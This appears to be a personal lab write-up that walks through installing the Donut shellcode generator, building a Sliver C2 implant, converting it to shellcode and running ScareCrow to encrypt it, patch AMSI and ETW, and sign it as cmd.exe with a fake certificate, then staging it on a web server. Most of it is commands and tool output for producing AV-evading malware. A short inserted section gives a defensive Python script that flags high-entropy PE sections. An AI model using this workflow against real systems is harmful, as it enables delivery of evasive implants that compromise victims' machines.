Donut
1st: sudo apt install g++-mingw-w64-x86-64 gcc-mingw-w64-x86-64
2nd: wget https://github.com/TheWover/donut/releases/download/v0.9.3/donut_v0.9.3.tar.gz
3rd: tar -xvzf donut_v0.9.3.tar.gz
Result:
bolke@js-donut:~/donut2/donut_v0.9.3$ ls -la
total 108
drwxr-xr-x 4 bolke bolke  4096 Dec 21  2019 .
drwxrwxr-x 3 bolke bolke  4096 May 13 11:28 ..
-rwxr-xr-x 1 bolke bolke 64912 Dec 21  2019 donut
-rw-r--r-- 1 bolke bolke  5309 Dec 21  2019 donut.1
drwxr-xr-x 2 bolke bolke  4096 Dec 21  2019 examples
drwxr-xr-x 2 bolke bolke  4096 Dec 21  2019 lib
-rw-r--r-- 1 bolke bolke  1517 Dec 21  2019 LICENSE
-rw-r--r-- 1 bolke bolke 12874 Dec 21  2019 README.html
bolke@js-donut:~/donut2/donut_v0.9.3$ ./donut

  [ Donut shellcode generator v0.9.3
  [ Copyright (c) 2019 TheWover, Odzhan

 usage: donut [options] <EXE/DLL/VBS/JS>

       Only the finest artisanal donuts are made of shells.

       -MODULE OPTIONS-

       -n <name>            Module name for HTTP staging. If entropy is enabled, this is generated randomly.
       -s <server>          HTTP server that will host the donut module.
       -e <level>           Entropy. 1=None, 2=Use random names, 3=Random names + symmetric encryption (default)

       -PIC/SHELLCODE OPTIONS-

       -a <arch>            Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default).
       -b <level>           Bypass AMSI/WLDP : 1=None, 2=Abort on fail, 3=Continue on fail.(default)
       -o <path>            Output file to save loader. Default is "loader.bin"
       -f <format>          Output format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=Powershell, 7=C#, 8=Hex
       -y <addr>            Create thread for loader and continue execution at <addr> supplied.
       -x <action>          Exiting. 1=Exit thread (default), 2=Exit process

       -FILE OPTIONS-

       -c <namespace.class> Optional class name. (required for .NET DLL)
       -d <name>            AppDomain name to create for .NET assembly. If entropy is enabled, this is generated randomly.
       -m <method | api>    Optional method or function for DLL. (a method is required for .NET DLL)
       -p <arguments>       Optional parameters/command line inside quotations for DLL method/function or EXE.
       -w                   Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)
       -r <version>         CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
       -t                   Execute the entrypoint of an unmanaged EXE as a thread.
       -z <engine>          Pack/Compress file. 1=None, 2=aPLib

 examples:

    donut c2.dll
    donut -a1 -cTestClass -mRunProcess -pnotepad.exe loader.dll
    donut loader.dll -c TestClass -m RunProcess -p"calc notepad" -s http://remote_server.com/modules/

bolke@js-donut:~/donut2/donut_v0.9.3$
…
Or with Docker
Install on Ubuntu 24.04.02 LTS: sudo docker build -t donut .
bolke@js-srv01:~/donut$ sudo docker build -t donut .
DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
            Install the buildx component to build images with BuildKit: https://docs.docker.com/go/buildx/

Sending build context to Docker daemon  14.69MB
Step 1/11 : FROM ubuntu:22.04
22.04: Pulling from library/ubuntu
215ed5a63843: Pull complete
Digest: sha256:67cadaff1dca187079fce41360d5a7eb6f7dcd3745e53c79ad5efd8563118240
Status: Downloaded newer image for ubuntu:22.04
 ---> c42dedf797ba
Step 2/11 : RUN apt-get update
 ---> Running in 2f62edb78629
Get:1 http://archive.ubuntu.com/ubuntu jammy InRelease [270 kB]
Get:2 http://security.ubuntu.com/ubuntu jammy-security InRelease [129 kB]
Get:3 http://archive.ubuntu.com/ubuntu jammy-updates InRelease [128 kB]
--snip--
loader_exe_x86.go
loader_exe_x86.h
pyproject.toml
setup.py
version-release-notes.txt
 ---> Removed intermediate container 4cad547e0fa4
 ---> fff5ee8ca773
Step 11/11 : ENTRYPOINT ["/opt/donut/donut"]
 ---> Running in 354facff12fe
 ---> Removed intermediate container 354facff12fe
 ---> 124c8ac52483
Successfully built 124c8ac52483
Successfully tagged donut:latest
bolke@js-srv01:~/donut$
Then: sudo docker run -it --rm -v "${PWD}:/workdir" donut -h
bolke@js-srv01:~$ sudo docker run -it --rm -v "${PWD}:/workdir" donut -h

  [ Donut shellcode generator v1 (built May 12 2025 13:50:10)
  [ Copyright (c) 2019-2021 TheWover, Odzhan

 usage: donut [options] <EXE/DLL/VBS/JS>

       Only the finest artisanal donuts are made of shells.

       -MODULE OPTIONS-

       -n,--modname: <name>                       Module name for HTTP staging. If entropy is enabled, this is generated randomly.
       -s,--server: <server>                      Server that will host the Donut module. Credentials may be provided in the following format: https://username:password@192.168.0.1/
       -e,--entropy: <level>                      Entropy. 1=None, 2=Use random names, 3=Random names + symmetric encryption (default)

       -PIC/SHELLCODE OPTIONS-

       -a,--arch: <arch>,--cpu: <arch>            Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default).
       -o,--output: <path>                        Output file to save loader. Default is "loader.bin"
       -f,--format: <format>                      Output format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=Powershell, 7=C#, 8=Hex
       -y,--fork: <offset>                        Create a new thread for the loader and continue execution at <offset> relative to the host process's executable.
       -x,--exit: <action>                        Exit behaviour. 1=Exit thread (default), 2=Exit process, 3=Do not exit or cleanup and block indefinitely

       -FILE OPTIONS-

       -c,--class: <namespace.class>              Optional class name. (required for .NET DLL)
       -d,--domain: <name>                        AppDomain name to create for .NET assembly. If entropy is enabled, this is generated randomly.
       -i,--input: <path>,--file: <path>          Input file to execute in-memory.
       -m,--method: <method>,--function: <api>    Optional method or function for DLL. (a method is required for .NET DLL)
       -p,--args: <arguments>                     Optional parameters/command line inside quotations for DLL method/function or EXE.
       -w,--unicode                               Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)
       -r,--runtime: <version>                    CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
       -t,--thread                                Execute the entrypoint of an unmanaged EXE as a thread.

       -EXTRA-

       -z,--compress: <engine>                    Pack/Compress file. 1=None, 2=aPLib
       -b,--bypass: <level>                       Bypass AMSI/WLDP/ETW : 1=None, 2=Abort on fail, 3=Continue on fail.(default)
       -k,--headers: <level>                      Preserve PE headers. 1=Overwrite (default), 2=Keep all
       -j,--decoy: <level>                        Optional path of decoy module for Module Overloading.

 examples:

    donut -ic2.dll
    donut --arch:x86 --class:TestClass --method:RunProcess --args:notepad.exe --input:loader.dll
    donut -iloader.dll -c TestClass -m RunProcess -p"calc notepad" -s http://remote_server.com/modules/

bolke@js-srv01:~$ pwd
/home/bolke
bolke@js-srv01:~$
See it in action
1. Generate the payload from SliverC2
sliver > generate --mtls 10.8.0.8 --os windows --arch amd64 --format exe -G --skip-symbols

[*] Generating new windows/amd64 implant binary
[!] Symbol obfuscation is disabled
[*] Build completed in 2s
[*] Implant saved to /home/bolke/STABLE_YAK.exe

sliver >
2. Donut the file
┌──(bolke㉿bolke)-[~/donut_v0.9.3]
└─$ ./donut STABLE_YAK.exe

  [ Donut shellcode generator v0.9.3
  [ Copyright (c) 2019 TheWover, Odzhan
  [ Instance type : Embedded
  [ Module file   : "STABLE_YAK.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : x86+amd64
  [ AMSI/WDLP     : continue
  [ Shellcode     : "loader.bin"

┌──(bolke㉿bolke)-[~/donut_v0.9.3]
3. Install ScareCrow requirements
┌──(bolke㉿bolke)-[~]
└─$ osslsigncode
Command 'osslsigncode' not found, but can be installed with:
sudo apt install osslsigncode
Do you want to install it? (N/y)y
sudo apt install osslsigncode
Installing:
  osslsigncode

Summary:
  Upgrading: 0, Installing: 1, Removing: 0, Not Upgrading: 210
  Download size: 79.6 kB
  Space needed: 236 kB / 77.4 GB available

Get:1 http://kali.download/kali kali-rolling/main amd64 osslsigncode amd64 2.9-2 [79.6 kB]
Fetched 79.6 kB in 0s (231 kB/s)
Selecting previously unselected package osslsigncode.
(Reading database ... 459883 files and directories currently installed.)
Preparing to unpack .../osslsigncode_2.9-2_amd64.deb ...
Unpacking osslsigncode (2.9-2) ...
Setting up osslsigncode (2.9-2) ...
Processing triggers for kali-menu (2025.2.7) ...
Verify:
┌──(bolke㉿bolke)-[~]
└─$ osslsigncode -v
osslsigncode 2.9, using:
        OpenSSL 3.3.2 3 Sep 2024 (Library: OpenSSL 3.5.0 8 Apr 2025)
Default -CAfile location: /etc/ssl/certs/ca-certificates.crt

Please send bug-reports to Michal.Trojnara@stunnel.org
4. Run ScareCrow
┌──(bolke㉿bolke)-[~]
└─$ ./ScareCrow_5.1_linux_amd64 -I /home/bolke/STABLE_YAK.exe --domain microsoft.com

(ScareCrow ASCII-art banner omitted)
                                                        (@Tyl0us)
        “Fear, you must understand is more than a mere obstacle.
        Fear is a TEACHER. the first one you ever had.”

[*] Encrypting Shellcode Using ELZMA Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[+] Patched AMSI Enabled
[+] Sleep Timer set for 2385 milliseconds
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With cmd's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing cmd.exe With a Fake Cert
[+] Signed File Created
[+] Binary Compiled
[!] Sha256 hash of cmd.exe: 1d099be96c341bc9b0c4bb2120fc74c95effbc1ad840c0b34813988fa9314ee8
┌──(bolke㉿bolke)-[~]
5. Copy the signed executable (here cmd.exe) to your Python web server or similar.
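A defender-side check, added here as an example and not part of the original write-up or of either tool: Donut ("Entropy : Random names + Encryption") and ScareCrow ("Encrypting Shellcode Using ELZMA Encryption", "Creating an Embedded Resource File") both leave the payload encrypted inside the final binary, and encrypted or packed data stands out as a PE section with near-maximal byte entropy. The script below parses the PE section table with the standard library and flags such sections; the sample PE, the 7.2 threshold and the section names are constructed for this illustration.

```python
import hashlib
import math
import struct

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant run, close to 8.0 for encrypted or compressed data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def pe_sections(blob: bytes):
    """Yield (name, raw_bytes) per section, using only the COFF header and the section table."""
    if blob[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsec = struct.unpack_from("<H", blob, e_lfanew + 6)[0]        # NumberOfSections
    opt_size = struct.unpack_from("<H", blob, e_lfanew + 20)[0]   # SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                               # section table follows the optional header
    for i in range(nsec):
        name, _vsize, _va, rawsize, rawptr = struct.unpack_from("<8sIIII", blob, table + i * 40)
        yield name.rstrip(b"\0").decode("ascii", "replace"), blob[rawptr:rawptr + rawsize]

def high_entropy_sections(blob: bytes, threshold: float = 7.2):
    """Names of sections whose raw data looks encrypted or packed (entropy at or above threshold)."""
    return [name for name, data in pe_sections(blob) if shannon_entropy(data) >= threshold]

def build_sample_pe(sections):
    """Constructed minimal PE (no optional header) so the scan runs offline; not a real executable."""
    hdr_len = 0x40 + 4 + 20 + 40 * len(sections)
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 0, 0)
    table, body, ptr = b"", b"", hdr_len
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name, len(data), 0x1000, len(data), ptr, 0, 0, 0, 0, 0x40000040)
        body += data
        ptr += len(data)
    return dos + b"PE\0\0" + coff + table + body

# Constructed sample: a plain code section plus a resource section of pseudo-random bytes,
# standing in for an encrypted shellcode blob embedded as a resource.
SAMPLE_PE = build_sample_pe([
    (b".text", b"\x90" * 1024 + b"Hello from a boring program\0" * 8),
    (b".rsrc", b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))),
])
```

Entropy alone is a heuristic: legitimately compressed resources or bundled certificates also score high, so treat a flagged section as a trigger for further analysis rather than a verdict.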
Not sure if needed (but I did install both):
┌──(bolke㉿bolke)-[~/vulnlab/wutai]
└─$ go
Command 'go' not found, but can be installed with:
sudo apt install gccgo-go
sudo apt install golang-go
Regards
references: